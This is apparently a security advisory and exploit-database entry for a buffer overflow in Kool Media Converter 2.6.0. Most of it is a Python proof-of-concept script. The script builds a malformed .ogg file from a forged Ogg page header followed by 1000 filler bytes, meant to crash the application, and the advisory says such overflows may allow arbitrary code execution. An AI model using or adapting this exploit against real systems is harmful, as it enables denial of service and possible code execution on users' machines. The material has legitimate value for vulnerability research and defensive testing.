source: https://www.securityfocus.com/bid/50651/info
Kool Media Converter is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data.
Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
Kool Media Converter 2.6.0 is vulnerable; other versions may also be affected.#!/usr/bin/env python### Exploit Title: Kool Media Converter v2.6.0 DOS# Date: 10/10/2011# Author: swami# E-Mail: flavio[dot]baldassi[at]gmail[dot]com# Software Link: http://www.bestwebsharing.com/downloads/kool-media-converter-setup.exe# Version: 2.6.0# Tested on: Windows XP SP3 ENG##--- From Vendor Website# Kool Media Converter is a sound tool addressed to casual listeners and fervent # audiophiles likewise. It deals with compatibility problems between your audio files # and the media player you are using to help you enjoy all the songs you love anyway you like.##--- Description# Kool Media Converter fails to handle a malformed .ogg file
ogg = b'\x4F\x67\x67\x53'# Capture Pattern OggS in ascii
ogg += b'\x00'# Version currently 0
ogg += b'\x02'# Header Type of page that follows
ogg += b'\x00'* 8 # Granule Position
ogg += b'\xCE\xc6\x41\x49'# Bitstream Serial Number
ogg += b'\x00'* 4 # Page Sequence Number
ogg += b'\x70\x79\xf3\x3d'# Checksum
ogg += b'\x01'# Page Segment max 255
ogg += b'\x1e\x01\x76\x6f'# Segment Table
ogg += b'\x41'* 1000
try:
f = open('koolPoC.ogg','wb')
f.write(ogg)
f.close()
except:
print('\nError while creating ogg file\n')
